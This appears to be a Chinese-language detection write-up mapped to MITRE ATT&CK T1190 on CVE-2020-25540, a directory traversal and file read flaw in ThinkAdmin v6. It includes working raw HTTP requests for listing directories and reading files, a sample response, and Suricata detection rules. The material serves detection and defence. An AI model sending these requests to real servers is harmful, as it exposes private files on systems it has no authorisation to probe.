跳转至

T1190-CVE-2020-25540-目录遍历文件读取漏洞

来自ATT&CK的描述

使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。

如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。

对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。

测试案例

ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。

影响范围:ThinkAdmin版本小于 ≤ 2020.08.03.01

检测日志

HTTP

测试复现

Burp抓包,修改参数

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4e3eb8bf4d142b8bc21279a7418eea26
Upgrade-Insecure-Requests: 1
Content-Length: 27
Content-Type: application/x-www-form-urlencoded

rules=%5b%22%2e%5c%2f%22%5d

测试留痕

目录遍历

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

文件读取

GET /admin.html?s=admin/api.Update/get/encode/5i6s524v5s6j5y4q1a383c38 HTTP/1.1
Host: 192.168.100.194:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_lang=zh-cn; PHPSESSID=d1645e8a719cdc2b6b8eb98c50624f52
Connection: close

HTTP/1.1 200 OK
Host: 192.168.100.194:8000
Date: Wed, 09 Dec 2020 10:53:17 +0800
Connection: close
X-Powered-By: PHP/7.2.1
Content-Type:application/json; charset=utf-8
Set-Cookie: think_lang=zh-cn; path=/
Set-Cookie: PHPSESSID=d1645e8a719cdc2b6b8eb98c50624f52; path=/

...{"code":1,"info":".....................","data":{"content":"dGVzdHRlc3R0ZXN0"}}

检测规则/思路

Suricata规则

目录遍历检测规则

alert http any any -> any any (msg:"CVE-2020-25540-rsq";flow:established,to_server;content:"POST";http_method;content:"/admin.html?s=admin/api.Update/node";http_uri;content:"rules=";http_client_body;reference:url,www.freebuf.com/vuls/256529.html;flowbits:set,first_rsq;noalert;classtype:web-application-attck;sid:1;rev:1;)

alert http any any -> any any (msg:"CVE-2020-25540-目录遍历";flow:established,to_client;content:"200";http_stat_code;content:"获取文件列表成功";http_server_body;flowbits:isset,first_rsq;sid:2;rev:1;)

文件读取检测规则

alert http any any -> any any (msg:"CVE-2020-25540-rsq";flow:established,to_server;content:"GET";http_method;content:"/admin.html?s=admin/api.Update/get/encode/";http_uri;reference:url,www.freebuf.com/vuls/256529.html;flowbits:set,first_rsq;noalert;classtype:web-application-attck;sid:1;rev:1;)

alert http any any -> any any (msg:"CVE-2020-25540-文件读取";flow:established,to_client;content:"200";http_stat_code;content:"data";http_server_body;flowbits:isset,first_rsq;sid:2;rev:1;)

建议

流量+安全设备比较容易检测到此攻击行为。

参考推荐

MITRE-ATT&CK-T1190

https://attack.mitre.org/techniques/T1190/

CVE-2020-25540目录遍历文件读取漏洞

https://www.freebuf.com/vuls/256529.html